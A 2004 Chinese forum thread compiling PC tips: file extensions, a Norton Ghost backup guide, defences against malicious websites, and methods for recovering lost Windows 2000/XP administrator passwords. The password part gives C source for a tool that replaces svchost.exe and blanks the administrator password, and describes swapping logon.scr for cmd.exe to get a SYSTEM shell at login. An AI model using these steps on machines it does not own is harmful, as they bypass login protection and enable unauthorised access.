000-999：用于为老版本（或备份）文件编号（比如：被安装程序改变的CONFIG.SYS文件）；又可用于为小范围的PC应用程序的多个用户相关数据文件编号
12M：Lotus 1-2-3 97 SmartMaster文件
123：Lotus 1-2-3 97文件
2D：VersaCAD的2维绘画文件
2GR，3GR：在Windows之下的VGA图形驱动程序/配置文件
386：在386或更高级处理器上使用的文件
3D：VersaCAD的3维绘画文件
3DM：3D NURBS建模器，Rhino
3DS：3D Studio（DOS下）格式文件
386：在386或更高级处理器上使用的文件
4GE：Informix 4GL编译后代码
4GL：Informix 4GL源代码
669：Composer 669；UNIX Composer音乐模型文件；669磁道模块
#01 及更高的号：为计算机演示而扫描的一系列电影的图片文件编号方法
\$\$\$：OS/2用来跟踪档案文件
@@@：用于安装过程中的屏幕文件和用于Microsoft Code view for C这样的应用程序的指导文件

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 03:59　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:07am 第 1 次编辑]

三。★★★GHOST怎么用?
系统备份
使用Ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击Local（本地）项，在右面弹出的菜单中有3个子项，其中Disk表示备份整个硬盘（即克隆）、Partition表示备份硬盘的单个分区、Check表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。
选Local→Partition→To Image菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有GHO的后缀名。 接下来，程序会询问是否压缩备份数据，并给出3个选择：No表示不压缩，Fast表示压缩比例小而执行备份速度较快，High就是压缩比例高但执行备份速度相当慢。最后选择Yes按钮即开始进行分区硬盘的备份。Ghost备份的速度相当快，不用久等就可以完成，备份的文件以GHO后缀名储存在设定的目录中。
系统克隆
硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，Ghost可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择Yes开始执行。
Ghost能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。
Ghost还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。
系统还原
如果硬盘中备份的分区数据受到损坏，用一般数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。
要恢复备份的分区，就在界面中选择菜单Local→Partition→From Image，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击Yes按钮即可。
软件特性
存贮介质
Ghost 支持的存储介质超出了我们的想象，它支持对等LPT接口、对等USB接口、对等TCP/IP接口、SCSI磁带机、便携式设备（JAZ、ZIP、MO等）、光盘刻录机（CDR、CDRW）等。而这些特性不需要任何外带的驱动程序和软件，只需一张软盘就可以做到！特别是对光盘刻录机的支持，如今的刻录机和空白光盘都十分便宜，非常适合作备份的用途。
兼容性
Ghost 对现有的操作系统都有良好的支持，包括FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL等文件存储格式。同以前版本不同的是，Ghost 2001加入了对Linux EX2的支持（FIFO文件存储格式），这也就意味着Linux的用户也可以用Ghost来备份系统了。
配套软件支持
Ghost浏览器：在以前的Ghost版本中，我们只能对系统进行简单的备份、复制、还原，要恢复单个的文件和文件夹还要使用外带的GhostEXP软件。现在，Symantec公司已经将Ghost浏览器整合在软件中。Ghost浏览器采用类似于资源管理器的界面，通过它，我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。
Gdisk：Gdisk是一个新加入的实用工具，它彻底取代了FDisk和format：
* 快速格式化。
* 隐藏和显示分区的能力。此功能允许一个以上的主DOS分区，并且每个分区上的操作系统有不同的版本。隐藏分区的能力使计算机习惯于引导到选定的可引导分区，忽略其他隐藏分区中相同操作系统的安装。
* 全面的分区报告。
* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。
和使用交互式菜单的FDisk不同，GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义GDisk操作的能力。但与此同时，几十个参数会令普通用户头疼，因此笔者不推荐一般用户使用，Symantec公司也应该推出相应的GUI（图形用户界面）控制台以方便用户使用。具体的参数说明可以用命令行gdisk/?了解。
Live Update
Live Update是Symantec公司软件的一个通用升级程序，它能够检查当前系统中已安装的Symantec软件，并且通过英特网对软件进行在线升级。
在安装Ghost 2001时，安装程序自动升级了Live Update程序的版本。
Ghost 的进阶篇
附加的命令行参数：（限Ghost的无人备份/恢复/复制）
其实Ghost 2001的功能远远不止它主程序中显示的那些，Ghost可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂，不过我们可以制作批处理文件，从而“一劳永逸”（类似于无人安装Windows 98和Windows 2000）现在让我们来了解一些常用的参数（了解更加详细的参数介绍可查看Ghost的帮助文件）。
1.-rb
本次Ghost操作结束退出时自动重启。这样，在复制系统时就可以放心离开了。
2.-fx
本次Ghost操作结束退出时自动回到DOS提示符。
3.-sure
对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性，只建议高级用户使用。 4.-fro
如果源分区发现坏簇，则略过提示强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。
5.@filename
在filename中指定txt文件。txt文件中为Ghost的附加参数，这样做可以不受DOS命令行150个字符的限制。
6.-f32
将源FAT16分区拷贝后转换成FAT32（前提是目标分区不小于2G）。WinNT 4和Windows95、97用户慎用。
7.-bootcd
当直接向光盘中备份文件时，此选项可以使光盘变成可引导。此过程需要放入启动盘。
8.-fatlimit
将NT的FAT16分区限制在2G。此参数在复制Windows NT分区，且不想使用64k/簇的FAT16时非常有用。
9.-span
分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。
10.-auto
分卷拷贝时不提示就自动赋予一个文件名继续执行。
11.-crcignore
忽略备份包中的CRC ERROR。除非需要抢救备份包中的数据，否则不要使用此参数，以防数据错误。
12.-ia
全部映像。Ghost会对硬盘上所有的分区逐个进行备份。
13.-ial
全部映像，类似于-ia参数，对Linux分区逐个进行备份。
14.-id
全部映像。类似于-ia参数，但包含分区的引导信息。
15.-quiet
操作过程中禁止状态更新和用户干预。
16.-script
可以执行多个Ghost命令行。命令行存放在指定的文件中。
17.-span
启用映像文件的跨卷功能。
18.-split=x
将备份包划分成多个分卷，每个分卷的大小为x兆。这个功能非常实用，用于大型备份包复制到移动式存储设备上，例如将一个1.9G的备份包复制到3张刻录盘上。
19.-z
将磁盘或分区上的内容保存到映像文件时进行压缩。-z或-z1为低压缩率（快速）；-z2为高压缩率（中速）；-z3至-z9压缩率依次增大（速度依次减慢）。
20.-clone
这是实现Ghost无人备份/恢复的核心参数。使用语法为：
-clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)......]
此参数行较为复杂，且各参数之间不能含有空格。 　　其中operation意为操作类型，值可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。
Source意为操作源，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径。
Destination意为目标位置，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径；@CDx，刻录机，x表示刻录机的驱动器号，从1开始。
下面举例说明
命令行参数：ghostpe.exe -clone,mode=copy,src=1,dst=2
完成操作：将本地磁盘1复制到本地磁盘2。
命令行参数：ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1
完成操作：将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。 命令行参数：ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M
完成操作：从映像文件装载磁盘1，并将第一个分区的大小调整为450MB，第二个调整为1599MB，第三个调整为2047MB。
命令行参数：ghostpe.exe -clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho
完成操作：创建仅具有选定分区的映像文件。从磁盘2上选择分区1、4、6。
了解了这些参数后，我们就可以轻松地实现Ghost的无人备份/复制/恢复了。冲杯咖啡吧。
一些示例
ghost.exe -clone,mode=copy,src=1,dst=2 -sure
硬盘对拷
ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure
将一号硬盘的第二个分区复制到二号硬盘的第一个分区
ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho
将一号硬盘的第二个分区做成映像文件放到g分区中
ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2
从内部存有两个分区的映像文件中，把第二个分区还原到硬盘的第二个分区
ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb
用g盘的bac.gho文件还原c盘。完成后不显示任何信息，直接启动。
ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P
将映像文件还原到第二个硬盘，并将分区大小比例修改成60:40
还原磁盘
首先做一个启动盘，包含Config.sys,Autoexec.bat,Command.com,Io.sys,Ghost.exe文件(可以用windows做启动盘的程序完成)。
Autoexec.bat可以包含以下命令：
Ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb
利用在d盘的文件自动还原，结束以后自动跳出ghost并且重新启动。
开机自动做C区的备份，在D区生成备份文件bac.gho。
ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb
还原光盘
包含文件：Config.sys,Autoexec.bat,Mscdex.exe(CDROM执行程序),Oakcdrom.sys(ATAPI CDROM兼容驱动程序),Ghost.exe
Config.sys内容为：
DEVICE=OAKCDROM.SYS /D:IDECD001
Autoexec.bat内容为：
MSCDEX.EXE /D:IDECE001 /L:Z
Ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb
可以根据下面的具体说明修改实例
-clone 在使用时必须加入参数，它同时也是所有的switch{batch switch}里最实用的一种，下面是clone所定义的参数
-clone,
mode={copy|load|dump|pcopy|pload|pdump},
src={drive|file|driveartition},
dst={drive|file|driveartition}
mode指定要使用哪种clone所提供的命令
copy 硬盘到硬盘的复制(disk to disk copy)
load 文件还原到硬盘(file to disk load)
dump 将硬盘做成映像文件(disk to file dump)
pcopy 分区到分区的复制(partition to partition copy)
pload 文件还原到分区(file to partition load)
pdump 分区备份成映像文件（partition to file dump）
src指定了ghost运行时使用的源分区的位置模式及其意义:
mode命令 对应mode命令src所使用参数 例子
COPY/DUMP
源硬盘号。
以1代表第一号硬盘
LOAD 映像文件名
g:/back98/setup98.gho 或装置名称(drive)
PCOPY/PDUMP
源分区号。
１：２代表的是硬盘１的第二个分区
PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。
g:\back98\setup98.gho:2,代表映像文件里的第二个分区
dst运行Ghost时使用的目标位置模式及其意义:
mode命令 对应mode命令dst所使用参数 例子
COPY/DUMP 目的硬盘号。
2代表第二号硬盘
LOAD 硬盘映像文件名。
例g:\back98\setup98.gho
PCOPY/PLOAD 目的分区号。
2:2 代表的是，硬盘2的第二个分区
PDUMP 分区映像文件名加分区号。
g:\back98\setup98.gho:2
SZEn指定所使用目的分区的大小
n=xxxxM 指定第n目的分区的大小为xxxxMB SZE2=800M表示分区2的大小为800MB
n=mmP 指定地n的目的分区的大小为整个硬盘的mm个百分比。
其他参数
-fxo 当源物件出现坏块时，强迫复制继续进行
-fx 当ghost完成新系统的工作后不显示"press ctrl-alt-del to reboot"直接回到DOS下
-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源，复制一个分区时，Ghost将首先检查来源分区，再决定是要复制文件和目录结构还是要做映像复制(扇区到扇区)。预设是这种形式。但是有的时候，硬盘里特定的位置可能会放一些隐藏的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制
-pwd and -pwd=x 给映像文件加密
-rb 在还原或复制完成以后，让系统重新启动
-sure 可以和clone合用。Ghost不会显示"proceed with disk clone-destination drive will be overwritten?"提示信息
注意事项
1. 在备份系统时，单个的备份文件最好不要超过2GB。
2.在备份系统前，最好将一些无用的文件删除以减少Ghost文件的体积。通常无用的文件有：Windows的临时文件夹、IE临时文件夹、Windows的内存交换文件。这些文件通常要占去100多兆硬盘空间。
3.在备份系统前，整理目标盘和源盘，以加快备份速度。
4.在备份系统前及恢复系统前，最好检查一下目标盘和源盘，纠正磁盘错误。
5.在恢复系统时，最好先检查一下要恢复的目标盘是否有重要的文件还未转移，千万不要等硬盘信息被覆盖后才后悔莫及啊。
6.在选择压缩率时，建议不要选择最高压缩率，因为最高压缩率非常耗时，而压缩率又没有明显的提高。
7.在新安装了软件和硬件后，最好重新制作映像文件，否则很可能在恢复后出现一些莫名其妙的错误。
-------------------------------------------------------------------------------
Ghostpe.exe菜单选项介绍
Norton Ghost的帮助文件中要求Ghostpe.exe在纯DOS下运行，其实它在WINDOWS的MS-DOS中运行也是可以的，同样可以对系统进行备份和还原。
开机进入DOS，键入Ghostpe.exe所在的目录路径名，比如：E:\Ghostpe.exe 回车，程序即开始运行。首先出现的是Ghost版本介绍窗口，回车后进入主界面。菜单选项有：
    （一）“Local”（本地的）
    1、Disk（磁盘）
（1） To Disk（硬盘到硬盘的复制）
（2）To Image（硬盘内容备份为镜像）
（3）From Image（从镜像文件恢复至硬盘）
  2、Partition（分区）
    （1）To Partition（分区到分区的复制）
    （2）To Image（分区内容备份为镜像）
    （3）From Image（从镜像文件恢复至分区）
  3、Check(检查)
（1） Image File（镜像文件）
（2）Disk（磁盘）
    （二）Option（设置项，一般情况下使用默认值即可）
    （三）Quit（退出）
Norton ghost——克隆硬盘的魅影
我们能用Ghost做什么
    ●可以创建硬盘镜像备份文件
    ●可以将备份恢复到原硬盘上
    ●磁盘备份可以在各种不同的存储系统间进行
    ●支持FAT16/32、NTFS、OS/2等多种分区的硬盘备份
    ●支持Win9X、NT、UNIX、Novell等系统下的硬盘备份
    ●可以将备份复制(克隆)到别的硬盘上
    ●在复制(克隆)过程中自动分区并格式化目的硬盘
Ghost是最著名的硬盘复制备份工具，因为它可以将一个硬盘中的数据完全相同地复制到另一个硬盘中，因此大家就将Ghost这个软件称为硬盘“克隆”工具。实际上，Ghost不但有硬盘到硬盘的克隆功能，还附带有硬盘分区、硬盘备份、系统安装、网络安装、升级系统等功能。1998年6月，出品Ghost的Binary公司被著名的Symantec公司购并，因此该软件的后续版本就改称为Norton Ghost，成为Nordon系列工具软件中的一员。1999年2月，Symantec公司发布了Norton Ghost的5.1C版本，该版本包含了多个硬盘工具，并且在功能上作了较大的改进，使之成为了一个真正的商业软件。
安装
本公司为使各位客户的机器万无一失，早已经为您的机器中装入了GHOST软件，并在您取走机器前为您做好备份，免去您的后顾之忧。此软件不需安装，复制即可使用。
Ghost硬盘克隆
Ghost就是克隆硬盘的程序，该程序在DOS下、Windows9.X下都可执行，所以要进行硬盘的克隆，请先进入到Ghost子目录，运行Ghost.exe程序，需要注意的是，如果是在DOS下运行该程序时，在运行该程序前最好启动DOS的鼠标驱动程序，因为Ghost的操作画面是仿窗口画面，使用鼠标点击来选择会方便一些——虽然也可以用键盘来操作。另外在备份或克隆硬盘前最好清理一下硬盘——删除不用文件、清空回收站、碎片整理等。
1. 分区备份
使用Ghost复制备份，有整个硬盘(Disk)和分区硬盘(Partition)两种备份方式。在菜单中点击“Local”(本地)项，在右面弹出的菜单中有三个子项，其中“Disk”表示整个硬盘备份(也就是克隆)，“Partition”表示单个分区硬盘备份以及硬盘检查“Check”。“Check”项的功能是检查硬盘或备份的文件，看是否可能因分区、硬盘被破坏等造成备份或还原失败。而分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区具有实用价值。
选“Local/Partition/To Image”菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区(用鼠标点击)。
然后在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有GHO的后缀名。
接下来，程序会询问是否压缩备份数据，并给出三个选择。“No”表示不压缩，“Fast”表示小比例压缩而备份执行速度较快，“High”就是高比例压缩但备份执行速度较慢。最后，选择“Yes”按钮即开始进行分区硬盘的备份。Ghost备份的速度相当快，不用久等就可以完成备份，备份的文件以GHO后缀名储存在设定的目录中。
2. 分区备份的还原
如果硬盘中备份的分区数据受到损坏，用一般磁盘数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原，无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。
要恢复备份的分区，就在界面中选择菜单“Local/Partition/From Image”，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击“Yes”按钮即可。
恢复还原时要注意的是，硬盘分区的备份还原是要将原来的分区一成不变地还原出来，包括分区的类型、数据的空间排列等。
3. 硬盘的克隆
硬盘的克隆就是对整个硬盘的备份和还原，选择菜单“Local/Disk/To Disk”，在弹出的窗口中选择源硬盘(第一个硬盘)，然后选择要复制到的目的硬盘(第二个硬盘)。注意，可以设置目的硬盘各个分区的大小，Ghost可以自动对目的硬盘按设定的分区数值进行分区和格式化。选择“Yes”开始执行。
Ghost能将目的硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目的硬盘不能太小，必须能将源硬盘的内容装下。
    Ghost还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上(菜单“Local/Disk/To Image”)，然后就可以随时还原到其它硬盘或原硬盘上。这对要安装多个系统硬盘很方便。使用方法与分区备份相似。要注意的是，备份成的文件不能大于2GB。
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:00　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:07am 第 1 次编辑]

四。★★★如何防范恶意网站

知己知彼
    如何判断自己是遇到了恶意网站的攻击，症状多种多样：
    1. 开机自动登录网站。
    2. 启动IE，自动登录网站，无法修复主页设置。
    3. IE不断打开窗口。
    4. 修改[主页]按钮和[搜索]按钮。
    5. 修改右键菜单，甚至屏蔽右键菜单。
    6. 更改收藏夹的内容。
    7. 安装自动拨号程序。
    8. 自动安装木马程序。
    9. 自动格式化硬盘或删除某个文件夹中的所有文件。
    10. 更新文件关联和锁死EXE程序。
    11. 锁死注册表。
    ……
    ★对症下药
    了解了症状，就要对症下药了！
一、备份
    建议使用“超级兔子魔法设置”中的“注册表优化”进行备份，软件能将Classes.dat、System.dat、System.ini、User.dat、Win.ini等文件全部备份下来，上面提到的前五种恶意网站无非就是通过修改这些文件来达到其目的的。
二、弃用IE
    大部分的攻击目标都是IE。如果我们用MyIE2（强烈建议使用Ver 0.8.220这一版本）代替IE浏览器，恶意网站就无的放矢了。MyIE2在启动时能够绕开主页直接打开空白页，而且还能保护主页不被修改。如果开机就自动运行IE，要先用超级兔子魔法设置中的“自动运行”功能将网址删除，再用MyIE2代替IE。
    注意：这两个功能在默认状态下是关闭的，您要在[选项]→[MyIE2选项]→[常规]中和“启动时”中将其打开。由于MyIE2使用IE的内核，所以请勿删除IE。
三、解救被封死的收藏夹
    某些恶意网站会对收藏夹进行修改，大多是通过修改“C:\ Windows/Favorites”中的“Desktop.ini”文件来实现的，所以只要删除这个文件就可以了。如果根本就无法打开“C:\ Windows\Favorites”文件夹，就到DOS下进行删除（要先用“attrib -r -s -h”后才能将其删除）。另外，“收藏夹”中的内容并没有被删除，只是放入了另一个文件夹中，名称和“Favorites”差不多（如“Favorites2”等），如果想恢复原来的“收藏夹”，只要剪切一下就可以了。
    如果是将系统默认的“收藏夹”路径设置成指定的目录（如“C:\ Windows\Favorites2”等），只要恢复正常的“注册表”就一切OK了。
四、定期还原正常的注册表
    如果遇到安装自动拨号程序的情况，你可要小心啦，小心惊人的国际长话费。对付它，最好是定期还原正常的注册表！这样做虽然不能彻底删除此类恶意程序，但却能让其完全禁止运行，因为这类程序是通过修改注册表来达到随机运行的目的的（只有极少数是在“开始”菜单的“启动”项内做文章），只不过我们无法通过手工删除干净。
    这个方法对于自动安装木马程序的情况也同样适用。
五、防止硬盘被格式化
    对于自动格式化硬盘的恶意网站，要把“C:\Windows\COMMAND”文件夹中的Format.com、Fdisk.exe、Deltree.exe这三个程序文件删除或进行改名，因为这些恶意代码是需要这些程序才能够发挥“威力”的，只要让这些恶意代码找不到它们，您的电脑也就安全了！
六、打开“锁死”的程序
    对于被锁死的EXE程序，只要事先已将“C:\Windows”目录下正常的Classes.dat、System.dat、User.dat、System.ini、Win.ini这五个文件备份下来，在“中招”后用正常的文件覆盖一下并重新启动就OK了（注：Windows 95和98中可能没有Classes.dat文件，而且Windows 97以下版本的操作系统用此方法无效！甚至会使整个系统瘫痪。）。如果连复制都被禁止了的话，您可用启动盘到DOS下进行覆盖复制。
七、“防”要胜于“治”
    通常恶意网站都披着具有“诱惑力”的外衣，设下诱人的陷阱让您“中招”。所以一定要意志坚强，抵制住诱惑。只要您能做到“任你花言巧语，我自岿然不动”。那么，什么样的陷阱也奈何不了您。
    另外，现在有很多恶意网站开始通过即时通讯软件来传播了，比如QQ、ICQ等，方式虽然多种多样，但通常是在对方网友的话后面又发来了一个网站信息，有的会附有一些带有“诱惑性”的话（如：“看看我的样子”等），有的只是一个有着诱人域名的网址，对于这样的网站，原则也同样——就是不上当！
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:01　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:08am 第 1 次编辑]

五。★★★win2000/xp忘记密码的方法

1。清除sam文件：
winnt系列的系统账户信息是存在%systemroot%\system32\config\sam这个注册表文件里的。如果系统里没有重要的账户，或者账户比较少，用删除%systemroot%\system32\config\sam的方法是比较简单的，不过因为系统会还原为只有administrator（密码为空）和guest二个账户，所以有些程序因为它们所依赖的账户丢失了，如iis、vmware就不能启动了。
原来听说这种方法只能适用于nt workstation系列（2kpro），不能用于server，我在2000professional和2000 advanced server上试验都是成功的。不知道为什么会有上述说法，可能是活动目录ad下不行把。
当然首先你要能够访问系统分区，来把sam文件改名或者删除。如果是fat32、fat分区，使用98启动盘就行了。如果是ntfs分区，可以使用winternal的ntfs for dos、ntfs for 98或者是支持ntfs的启动光盘，再或者挂到其他win2000、linux等机器上，再再或者重新安装一个新的win2000。

2。专用工具：
windows管理员密码丢失还有一个解决方法是使用petter nordahl-hagen的the offline nt password editor(http://home.eunet.no/~pnordahl/ntpasswd/)，这个工具是离线修改注册表文件sam来设置密码的。需要用他的映像文件制作启动盘来引导，进而访问ntfs分区重新设置密码；虽然作者经常更新他的程序，不过我还是会担心他直接操作sam文件的安全性，可能有时会导致系统出错。
可能还有其他类似工具把，恕我无知。

3。 还有一种想法就是用一个修改密码的小程序来替换系统启动的必要程序，然后系统启动时就会替换密码，随后把被替换的程序在还原就行了。当然首先你还是要能够访问系统分区，来替换随系统启动的程序。
替换系统启动的必要程序的一种方法是我写的一个清除administrator密码的小程序(cleanpwd)，他所作的就是把administrator密码清空。使用方法如下：
（2）.用法
1) 用双系统或者启动盘或者挂到别的系统上，如果是ntfs分区其他系统或启动盘要能读写ntfs分区，把windows安装目录下的system32\svchost.exe改名svchost.bak.exe备份,把cleanpwd.exe拷贝成svchost.exe。
2) 启动该系统，就把administrator的密码清空了，可以直接登陆。
3) 把svchost.bak.exe 恢复就行了。（如果使用替换的是svchost，最好再启动rpc服务）

（3）.为什么选用svchost.exe而不是其他程序。
每个windows2000系统都有这几个进程，
system(kernel executive and kernel)
smss(session manager)
csrss(win32 subsystem)
winlogon(logon process)
services(service control manager)
lsass(local security authentication server )
如果任何一个被杀掉或者出错，系统将重新启动。不过在lsass启动之前你不能修改密码，所以不能选用这几个程序。
另外系统中一般还有以下一些程序：
svchost.exe(remote procedure call (rpc) 还有其他一些服务)
wbem\winmgmt.exe(windows management umentation)
mstask.exe(task scheduler)
regsvc.exe(remote registry service)
可能还有其他服务程序，你可能禁止了除rpc之外的其他服务，但不会禁止rpc，否则系统工作就不正常了。所以我选择了svchost，如果你知道其他服务会自动启动，你也可以选择它。
当然如果系统安装了杀毒软件的话，你替换杀毒软件也可以，因为一般杀毒软件都会在系统启动是启动杀毒防火墙来杀毒的。

（4）.其他
有这个想法是几个月之前了，不过一直没有写这个程序 程序运行会在c:\cleanpwd.txt记一个简单的日志，我也附了源码，你可以任意修改它以满足自己的要求，比如添加一个用户而不是修改管理员的密码（或者你把管理员改名了）。

4。我还在一个网站上看到这样一个方法：
就是把%systemroot%\system32\logon.scr替换为cmd.exe或者explorer.exe，然后在系统登陆处等待，过一会，系统就会去运行logon.scr这个屏保，因为你替换了这个屏保文件，所以实际上运行的是cmd.exe或者explorer.exe，并且是localsystem权限，于是你可以随便了，最简单的就是在cmd.exe里运行net user administrator ""，成功后管理员密码也被清空了，关闭cmd或者explorer就可以用空口令登陆了。
其实这种方法和上边的那种思路是一致的。

================= code begin =======================
#include
#include
#include
#include
#include
#pragma comment(lib, "netapi32.lib")
#define lof_file "c:\\cleanpwd.txt"
dword setuserpwd(char *user, char *pass);
void banner(file *fp)
{
if(null == fp)return;
fprintf(fp, "clean administrator''s password tool 1a. for lost password.\n");
fprintf(fp, " by bingle@email.com.cn\n");
fprintf(fp, "website: www.binglesite.net\n");
}
int main(int argc, char *argv[])
{
banner(stderr);
file *fp = fopen(lof_file, "a");
if(fp)
{
fprintf(stderr, "log in file %s\n", lof_file);
banner(fp);
}
if(!fp) fp = stderr;
char buff[256];
fprintf(fp, "%s: clean administrator''s password ", _strtime(buff));
dword n = setuserpwd("administrator", "");
if(nerr_success == n) fprintf(fp, "ok.\n");
else fprintf(fp, "failed, error:%d\n", n);
fclose(fp);
return -1;
}

dword setuserpwd(char *user, char *pass)
{
wchar_t wuser[pwlen], wpass[pwlen];
user_info_1003 ui;
mbstowcs(wuser, user, strlen(user)+1);
mbstowcs(wpass, pass, strlen(pass)+1);
ui.usri1003_password = wpass;
return netusersetinfo(null, wuser, 1003, (lpbyte)&ui, null);
}
================= code end =======================
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:02　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:08am 第 1 次编辑]

六。★★★Windows XP 自带小工具
假设你使用的是WinXP，一般来讲你会把日常所用的工具软件都放到一个名为“Tools”的文件夹中。好的，先容我猜猜，里面都有些什么东东——加密的、图片浏览处理的、压缩/解压缩的、音视频播放的、刻录的、系统优化的……怎么样，猜得八九不离十吧？相信这些Tools平日里一定带来了不少方便，不过如果你仅满足于使用这些“Tools”的一般用途，那笔者就要为WinXP道一声“可惜”——它辛辛苦苦为你准备的百宝箱却被不经意地抛在了一旁。相比常用的工具软件，WinXP所提供工具的特点是整合在系统中，因此使用简单、快捷而方便，那么就随笔者一起掀开这个箱子，看看里面到底都有些什么宝贝吧。
一、文件保密
WinXP有着很好的多用户功能，允许不同用户拥有个性的系统设置。但在这样一个共享环境下，个人的隐私问题又凸现出来，由此涉及到了多用户使用下的文件保密问题。对于这个问题，你可能会考虑诸如“文件保密专家”之类的文件加密软件，其实在WinXP中，大可不必为文件的保密问题操心，因为它为我们提供了多种文件保密的方法。不过在为文件进行保密操作之前，首先要确定待保密的文件是放在NTFS分区上的，这是WinXP里进行文件保密的基础，以下的操作都是在NTFS分区上进行的。
1.个人文件夹的保密
在WinXP里最简单的文件保密方法是对“个人文件夹”的加密。所谓“个人文件夹”是指在“系统盘ocuments and Settings”下，以当前用户名命名的文件夹；其中包含了如“我的文档”、“开始菜单”一类的个人用户文件。对其进行加密，只需直接在其文件夹或其子文件夹的“属性”对话框的“共享”页上，勾选“将这个文件夹设为专用”（若为管理员用户则此处默认为勾选），那么其他用户（包括管理员）都无法访问此文件夹。此方法只适合于对“个人文件夹”的保密，对于系统的其他文件和文件夹则无能为力了。需要注意的是，设为“专用”的个人文件夹将不能被共享，同样，已共享的个人文件夹在取消共享之前也不能被设为“专用”。实际应用中，可将要保密的文件保存到设为专用的“我的文档”里，即可实现文件保密的目的。
2.利用用户权限保密文件
对于没有放在“个人文件夹”中的文件，我们可以有第2种保密方法：控制用户权限——通过对不同用户或者组，赋予对文件（文件夹）不同的操作权限，从而达到文件保密的目的。此操作进行之前先要确定WinXP中文件权限的设置功能是否开启：在文件浏览窗口中选择菜单“工具”→“文件夹选项”，选择“查看”页，确定“使用简单文件共享”没有被勾选。
之后，我们就能对系统的文件（文件夹）访问权限进行具体设置：打开文件夹的属性对话框，可以看到多出了一个“安全”页。在其中可以一目了然对于此文件夹可操作的用户及其不同的权限分派。各类权限有“允许”和“拒绝”两项可选，先在“组或用户名称”一栏里选择要保密的对象（如Guest用户），再将其“读取”的权限设为“拒绝”，如此便实现了此文件夹的保密。如果“组或用户名称”里没对象用户，选择下面的“添加”，输入（或搜索出）其用户名即可。
有可能你看到的用户权限设置是不可选的，那是因为此子文件夹从其父文件夹（上级文件夹）继承了权限，因此不可改。要使其权限可改，应删除其和父文件夹的继承关系：选择“安全”页的“高级”选项，打开“高级安全设置”对话框，在“权限”页里取消对“从父项继承那些可以应用到子对象的权限项目，包括那些在此明确定义的项目”的勾选，在弹出的对话框中选择“删除”即可。
3.加密文件系统（EFS）对文件的保密
